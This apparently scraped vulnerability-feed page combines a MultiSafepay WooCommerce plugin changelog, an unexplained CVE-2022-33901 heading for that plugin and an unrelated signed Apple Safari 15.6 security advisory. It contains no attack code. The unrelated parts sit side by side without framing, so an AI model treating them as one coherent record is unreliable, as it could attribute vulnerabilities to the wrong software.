**Release Notes – WooCommerce 4.13.0 (Feb 1st, 2022)****Added**

*   PLGWOOS-770: Add payment component support for payment options: Visa, Mastercard, Maestro and American Express
*   PLGWOOS-774: Add support to process ‘smart\_coupon’ coupons from Smart Coupons third party plugin
*   PLGWOOS-775: Log shopping cart content when debug mode is enabled

**Release Notes – WooCommerce 4.12.0 (Jan 13th, 2022)****Added**

*   PLGWOOS-769: Add new filter ‘multisafepay\_merchant\_item\_id’ to allow third party developers overwrite the merchant\_item\_id property within the ShoppingCart object

**Changed**

*   PLGWOOS-744: Update ‘Betaal per Maand’ default max\_amount value, according with new product rules
*   PLGWOOS-759: Rebrand Sofort payment method

**Release Notes – WooCommerce 4.11.0 (Jan 4th, 2022)****Added**

*   PLGWOOS-745: Add Payment Component

**Changed**

*   PLGWOOS-765: Refactor PaymentMethodsController::generate\_orders\_from\_backend() to work only with one argument and avoiding conflicts with third party plugins
*   PLGWOOS-745: Tokenization now works through the Payment Component

**Fixed**

*   PLGWOOS-763: Fix error on plugin list when application can not connect with wordpress network

**Release Notes – WooCommerce 4.10.0 (Dec 13th, 2021)****Added**

*   PLGWOOS-748: Add PHP-SDK version to system report
*   PLGWOOS-758: Add filter to turn notifications to GET method

**Removed**

*   DAVAMS-460: Remove ING Home’Pay

**Changed**

*   PLGWOOS-695: Replace HTTP Client, use WP\_HTTP instead kriswallsmith/buzz
*   PLGWOOS-749: Replace logo of Bancontact for new one

**Fixed**

*   PLGWOOS-752: Fix missing placeholder for Test API Key input field in settings page

**Release Notes – WooCommerce 4.9.0 (Oct 18th, 2021)****Added**

*   PLGWOOS-715: Add 2 “Generic Gateways” which include a flexible gateway code that allows any merchant to connect to almost every payment method we offer.
*   PLGWOOS-746: Declare support for WordPress 5.8.1 and WooCommerce 5.8.0

**Changed**

*   PLGWOOS-740: Improve the helper text of the Google Analytics ID setting field, adding a link to Documentation Center
*   PLGWOOS-747: Upgrade the PHP-SDK component to 5.3.0

**Fixed**

*   PLGWOOS-739: Fix fatal error related with undefined method when processing orders using iDEAL QR
*   PLGWOOS-743: Fix broken links to Documentation Center in settings page

**Release Notes – WooCommerce 4.8.3 (Sep 6th, 2021)****Fixed**

*   PLGWOOS-737: Fix error related with refunds by updating the PHP-SDK to 5.2.1

**Release Notes – WooCommerce 4.8.2 (Sep 2nd, 2021)****Added**

*   PLGWOOS-730: Declare support for WooCommerce 5.6.0

**Release Notes – WooCommerce 4.8.1 (Aug 9th, 2021)****Fixed**

*   PLGWOOS-727: Show error message from the API in the checkout page, when there is an error on direct transactions

**Release Notes – WooCommerce 4.8.0 (Aug 4th, 2021)****Added**

*   PLGWOOS-723: Declare support for WooCommerce 5.5.2 and WordPress 5.8
*   PLGWOOS-711: Add missing titles in setting pages

**Changed**

*   PLGWOOS-718: Remove PSP ID string when register the transaction ID in WC\_Order->payment\_complete()

**Release Notes – WooCommerce 4.7.0 (Jun 23th, 2021)****Added**

*   PLGWOOS-706: Declare support for WooCommerce 5.4.1

**Changed**

*   PLGWOOS-672: Change notification method from GET to POST by default

**Fixed**

*   PLGWOOS-704: Log errors in the MultiSafepay log file, when processing notifications.

**Release Notes – WooCommerce 4.6.0 (May 19th, 2021)****Added**

*   PLGWOOS-625: Add log section in MultiSafepay settings page
*   PLGWOOS-666: Add MultiSafepay system status section in settings page
*   PLGWOOS-376: Add support to show upgrade notices in plugin list
*   PLGWOOS-657: Add nl\_BE language

**Fixed**

*   PLGWOOS-694: Fix notification for orders fully paid with gift cards
*   PLGWOOS-692: Fix Second Chance within the orderRequest object
*   PLGWOOS-654: Fix the gateway\_id assigned to the properties of each token

**Release Notes – WooCommerce 4.5.1 (Apr 7th, 2021)****Fixed**

*   PLGWOOS-661: Fix payment methods ids to match list of gateway lists keys, which was producing an error to process notification for Sofort payments
*   PLGWOOS-663: Fix stock decreasing error, in relation with Bank Transfer gateway and notification flows

**Release Notes – WooCommerce 4.5.0 (Mar 31th, 2021)****Fixed**

*   PLGWOOS-659: Fix initialization of the plugin on multisite environments in which WooCommerce has been activate network wide

**Added**

*   PLGWOOS-534: Add generic gateway

**Release Notes – WooCommerce 4.4.1 (Mar 25th, 2021)****Fixed**

*   PLGWOOS-653: Fix overwriting initial order status when transaction is initialized

**Release Notes – WooCommerce 4.4.0 (Mar 23th, 2021)****Fixed**

*   PLGWOOS-648: Return 0 as tax rate, if WooCommerce taxes are disabled but tax rules are registered
*   PLGWOOS-647: Add verification to check if the token used in the transaction belongs to the customer

**Added**

*   PLGWOOS-651: Add setting to select type of transaction in SEPA Direct Debit, E-Invoicing, in3, Santander Consumer Finance, AfterPay and iDEAL
*   PLGWOOS-644: Add setting to select type of transaction in Pay After Delivery
*   PLGWOOS-640: Add setting to select type of transaction in Bank Transfer

**Release Notes – WooCommerce 4.3.0 (Mar 18th, 2021)****Fixed**

*   PLGWOOS-626: Fix order not being cancelled when customer cancels the order
*   PLGWOOS-630: Fix include shipping item in full refund of billing suite payment methods

**Added**

*   PLGWOOS-629: Add shipping item to the order request, even if this one is free
*   PLGWOOS-631: Add delivery address in order request even if the shipping amount is 0
*   PLGWOOS-634: Add settings field to redirect to checkout page or cart page on cancelling the order
*   PLGWOOS-635: Add suggestion to set default initial order status for bank transfer to wc-on-hold
*   PLGWOOS-636: Add notification endpoint from version 3.8.0 to process deprecated notifications

**Changed**

*   PLGWOOS-622: Change notification url for all payment methods to a single notification url

**Release Notes – WooCommerce 4.2.2 (Mar 16th, 2021)****Fixed**

*   PLGWOOS-632: Fix undefined method get\_the\_user\_ip
*   PLGWOOS-621: Fix division by zero when fee price is 0

**Release Notes – WooCommerce 4.2.1 (Mar 11th, 2021)****Fixed**

*   PLGWOOS-613: Fix error related with multiple forwarded IPs by updating the PHP-SDK to 5.0.1

**Added**

*   PLGWOOS-398: Add support to change the data in the OrderRequest using WordPress filters

**Changed**

*   PLGWOOS-614: Avoid changing order status if transaction is partially refunded

**Release Notes – WooCommerce 4.2.0 (Mar 9th, 2021)****Changed**

*   PLGWOOS-602: Move invoice and shipped settings field from order status tab to options tab
*   PLGWOOS-602: Remove completed status from order status tab in settings page
*   PLGWOOS-601: Change default status for declined transactions from wc-cancelled to wc-failed

**Fixed**

*   PLGWOOS-599: Fix typo in string message when payment method changes
*   PLGWOOS-598: Replace hardcoded url using plugins\_url function
*   PLGWOOS-605: Fix description of country filter field

**Added**

*   PLGWOOS-603: Add setting field for custom order description
*   PLGWOOS-604: Add forwarded IP to the CustomerDetails object
*   PLGWOOS-597: Support for orders with is\_vat\_exempt
*   PLGWOOS-606: Add chargedback transaction status in plugin settings

**Release Notes – WooCommerce 4.1.8 (Mar 5th, 2021)****Changed**

*   PLGWOOS-593: Register PSP ID in WooCommerce order using order complete payment method
*   PLGWOOS-593: Change notification method on completed status to use $order->complete\_payment()

**Fixed**

*   PLGWOOS-594: Fix Credit Card payment method form, to show description if customer is not logged in

**Release Notes – WooCommerce 4.1.7 (Mar 3th, 2021)****Changed**

*   PLGWOOS-579: Remove warning message on validation, when enabling CREDITCARD gateway

**Fixed**

*   PLGWOOS-584: Fix conflict with third party plugins related with Discovery exception
*   PLGWOOS-585: Set MultiSafepay transaction as shipped or invoiced using order number instead of order id

**Release Notes – WooCommerce 4.1.6 (Mar 2nd, 2021)****Added**

*   PLGWOOS-574: Add locale support

**Changed**

*   PLGWOOS-575: Change settings page capability requirement from manage\_options to manage\_woocommerce

**Fixed**

*   PLGWOOS-580: Show credit card payment method description in checkout
*   PLGWOOS-569: Remove class that trigger validation styles for ideal select in checkout page

**Release Notes – WooCommerce 4.1.5 (Feb 24th, 2021)****Fixed**

*   PLGWOOS-552: Fix product item price with discounts introduced by third party plugins (#252)

**Release Notes – WooCommerce 4.1.4 (Feb 23th, 2021)****Fixed**

*   PLGWOOS-563: Remove some nonce validations to support custom checkouts forms (#249)
*   PLGWOOS-550: Typecast cart item quantity to int to avoid errors in the PHP-SDK (#248)

**Changed**

*   PLGWOOS-556: Change composer dependencies to avoid conflicts with other plugins (#247)
*   PLGWOOS-562: Add fallback for in3, in case no fields is filled in checkout, convert the transaction to redirect type (#250)

**Release Notes – WooCommerce 4.1.3 (Feb 21th, 2021)****Fixed**

*   PLGWOOS-549: Support custom order numbers generated by third party plugins in notification method
*   PLGWOOS-551: Resize logo if theme used by merchant do not support WooCommerce

**Release Notes – WooCommerce 4.1.2 (Feb 19th, 2021)****Fixed**

*   PLGWOOS-548: Fix iDEAL gateway if no issuer selected in checkout

**Release Notes – WooCommerce 4.1.1 (Feb 18th, 2021)****Changed**

*   PLGWOOS-545: Remove API Key validation

**Release Notes – WooCommerce 4.1.0 (Feb 17th, 2021)****Added**

*   PLGWOOS-512: Add support for tokenization.
*   PLGWOOS-521: Change order status on callback even if merchant did not save the settings, using defaults.
*   PLGWOOS-530: Process notification, even when the payment method returned by MultiSafepay is not registered as WooCommerce gateway.
*   PLGWOOS-531: Avoid process refund if amount submited in backend is 0

**Fixed**

*   PLGWOOS-535: Fix bug min\_amount filter
*   PLGWOOS-536: Fix instructions in multi select country field
*   PLGWOOS-518: Fix protocol of notification URL
*   PLGWOOS-526: Fix typo error in AfterPay payment method title
*   PLGWOOS-523: Fix type of transaction to redirect for Dotpay payment method

**Changed**

*   PLGWOOS-519: Improvement for coupons support in ShoppingCart.
*   PLGWOOS-528: Refactor gender and salutation fields to process different validation messages
*   PLGWOOS-503: Move debug mode field to options section

**Removed**

*   PLGWOOS-525: Remove validation in backend for MultiSafepay payment method
*   PLGWOOS-516: Avoid initialize the plugin if WooCommerce is not active

**Release Notes – WooCommerce 4.0.0 (internal release) (Feb 12th, 2021)****Added**

*   Complete rewrite of the plugin
*   Full and partial refunds for non billing suite payment methods
*   Full refunds for billing suite payment methods
*   Set MultiSafepay transactions as shipped when order reach the defined status in settings
*   Set MultiSafepay transaction as invoiced when order reach the defined status in settings
*   Filter payment methods by country
*   Filter payment methods by maximum amount of order
*   Filter payment methods by minimum amount of order
*   Custom initialized status for each payment method
*   Validations in backend settings fields
*   Support for compound taxes

**Changed**

*   PLGWOOS-410: Refactor plugin using the PHP-SDK

**Removed**

*   Remove FastCheckout

CVE-2022-33901: MultiSafepay plugin for WooCommerce

Apple Security Advisory Safari - Safari 15.6 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

Safari 15.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213341.

Safari Extensions  
Available for: macOS Big Sur and macOS Catalina  
Impact: Visiting a maliciously crafted website may leak sensitive  
data  
Description: The issue was addressed with improved UI handling.  
CVE-2022-32784: Young Min Kim of CompSec Lab at Seoul National  
University

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero  
Day Initiative

WebRTC  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution.  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

Safari 15.6 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1p  
rhh3QA//cN/O9LcDr67uACD/222GDWGZnm80emLeEmJaczyRYZNswciqGhAc7EPd  
qfyVvzq2DHAvFm64gGSGX6rzOzZbY9QRvkQ4TodqugeBoAIO0VM2moLTO/KR74fE  
SwWeWHTrPYD9k6/zCL7o3XdrwTcqvlbYD9AXSIJ1lI4BmmbDIjjLFjH5NfrsBixy  
vthQmj99twepLofgo1Wfjg1AfwUMrr6BVnZcpxEyBBjrjpBD5FVEZWJ+RB4nUaKP  
6aM4CPpXqPbou0w3bgMt0K8x2qpudolxOFfStu2FsSFVnw2B5khgcCL0C2qIO9Hb  
5n5NDb1FuPI7sDNcREIbBGjHqcjpQv5wkF7lz1EK6UQk3D4Rp8RJXFKYDWgwKNVA  
GcMEBXW8XmI3UrfpRJi/B8o/rMA9y75hVnPujl+KN9jX/6Ey7p09OK3hJavaFDuY  
heZyqdlfAa81Gwf+VBoF8bkYKZj2GCGOOL+zsuPLrtyEL8y28P5ZIBc5ALSzDgK5  
Fv4VnaE4adu8NIqU3DimQeD44G4IpZAhhS4BMiTVosZ+KUjtnX3hmFR+wI8bV2I1  
oBYtwRZOUyMHAfRSLtJFriqy5N5XK4NRD4Xb9q5auOOeyhWcgGY0K+9kSTNdDP6o  
hR93N6uOYQt7htOmiXF7ztUDMikh2i7A9NScLyX/k3y9uvtWMmw=  
=bU24  
-----END PGP SIGNATURE-----

Tag

#apple